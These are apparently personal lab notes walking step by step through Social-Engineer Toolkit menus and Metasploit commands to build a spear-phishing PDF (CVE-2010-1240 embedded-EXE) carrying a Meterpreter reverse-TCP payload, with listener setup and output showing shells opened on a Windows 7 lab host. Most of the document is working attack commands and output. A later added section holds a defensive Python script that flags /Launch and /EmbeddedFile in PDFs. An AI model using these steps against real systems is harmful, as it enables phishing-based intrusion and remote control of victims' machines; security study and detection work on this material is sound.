Setoolkit Social Engineer Toolkit
Incomplete notes on Setoolkit (Social Engineer Toolkit)
em50l@jejo.es$
root@kali:~# setoolkit
[-] New set.config.py file generated on: 2019-07-25 18:20:23.599801
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2019-07-25 18:20:23.599801
[*] SET is using the new config, no need to restart
Copyright 2019, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
...
We select 1) Social-Engineering Attacks.
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Then 1) Spear-Phishing Attack Vectors.
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 1
And then 2) Create a FileFormat Payload.
The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing>2
We choose 14) Adobe util.printf() Buffer Overflow.
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
set:payloads>14
And finally the payload that goes inside the file-format exploit:
1) Windows Reverse TCP Shell
1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>1
Finally we configure the exploit parameters: in this case the IP address or URL the payload will connect back to, and the port.
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.4]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
...
[*] Payload creation complete.
[*] All payloads get sent to the template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.
Note: cross-compilation does not seem to work (from ARM to x86).
The file is at this path:
root@kali:~# find /root | grep template.pdf
/root/.msf4/local/template.pdf
/root/.set/template.pdf
root@kali:~#
Neither of them worked.
But this does seem to have worked:
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > run
[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'evil.pdf' file...
[+] evil.pdf stored at /root/.msf4/local/evil.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lport 8080
lport => 8080
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.102:443
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > set lport 8080
lport => 8080
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.102:8080
[*] Sending stage (179779 bytes) to 192.168.56.104
[*] Meterpreter session 3 opened (192.168.56.102:8080 -> 192.168.56.104:49170) at 2019-07-25 18:32:22 -0400
meterpreter >
Attempt 2
msf5 > use exploit/windows/fileformat/
Display all 183 possibilities? (y or n)
use exploit/windows/fileformat/a_pdf_wav_to_mp3
use exploit/windows/fileformat/abbs_amp_lst
use exploit/windows/fileformat/acdsee_fotoslate_string
use exploit/windows/fileformat/acdsee_xpm
...
...
msf5 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > info
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lhost 192.168.56.101
lhost => 192.168.56.101
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set lport 8080
lport => 8080
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set filename adobe_pdf_embedded_exe_192_168_56_101_8080.pdf
filename => adobe_pdf_embedded_exe_192_168_56_101_8080.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > run
[*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[+] Parsing Successful. Creating 'adobe_pdf_embedded_exe_192_168_56_101_8080.pdf' file...
[+] adobe_pdf_embedded_exe_192_168_56_101_8080.pdf stored at /root/.msf4/local/adobe_pdf_embedded_exe_192_168_56_101_8080.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) >
Once the PDF that will be opened on the target machine has been created, it would have to be delivered (e.g. by email) and the listener started (reverse_tcp).
I launch the multi/handler by hand from msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set lport 8080
run
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf5 exploit(multi/handler) > set lport 8080
lport => 8080
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.101:8080
[*] Sending stage (179779 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:8080 -> 192.168.56.1:44396) at 2019-07-26 05:05:47 -0400
meterpreter > sysinfo
Computer        : W7MINPC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
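The defender-side counterpart to the attachment built above, added here as an example and not part of the original notes: a static triage of a PDF for the /Launch action and /EmbeddedFile object that the adobe_pdf_embedded_exe (CVE-2010-1240) style of dropper is associated with, including the #xx name-escape trick that hides those keywords from plain string matching. The sample PDFs and the function names are constructed for the demo.

```python
# Added example, not part of the original notes: static triage of a PDF attachment
# for the active-content features an embedded-EXE dropper relies on.
# The sample PDFs below are constructed for the demo.
import re

# Keywords that give a PDF active content; /Launch together with /EmbeddedFile
# is the combination used to drop and start an embedded executable.
SUSPICIOUS = (b"/Launch", b"/EmbeddedFile", b"/OpenAction", b"/AA",
              b"/JavaScript", b"/JS")

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes in PDF name tokens (/#4Caunch -> /Launch),
    a common trick for hiding keywords from naive string scanners."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count suspicious keywords and return a verdict: block, review or clean."""
    norm = normalize_names(data)
    counts = {}
    for kw in SUSPICIOUS:
        # The lookahead stops /JS from matching the start of a longer name.
        counts[kw.decode()] = len(re.findall(re.escape(kw) + rb"(?![A-Za-z])", norm))
    if counts["/Launch"] and counts["/EmbeddedFile"]:
        verdict = "block"    # embedded file plus launch action: dropper pattern
    elif any(counts.values()):
        verdict = "review"   # active content present, needs a human look
    else:
        verdict = "clean"
    return {"verdict": verdict, "counts": counts}


# Constructed sample: catalog whose OpenAction points at an obfuscated /Launch
# action, plus an obfuscated /EmbeddedFile object (#4C = 'L', #45 = 'E').
SAMPLE_DROPPER = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /#4Caunch /F (payload.exe) >> endobj\n"
    b"5 0 obj << /Type /#45mbeddedFile /Length 0 >> stream\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
SAMPLE_CLEAN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for name, pdf in (("dropper", SAMPLE_DROPPER), ("clean", SAMPLE_CLEAN)):
        print(name, triage_pdf(pdf))
```

A production scanner would also inflate FlateDecode streams before matching, since the same keywords can sit inside compressed object streams.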
The multi/handler launched by hand from msfconsole, this time on port 443:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set lport 443
run
And the same handler for the 192.168.1.4 address:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set lport 443
run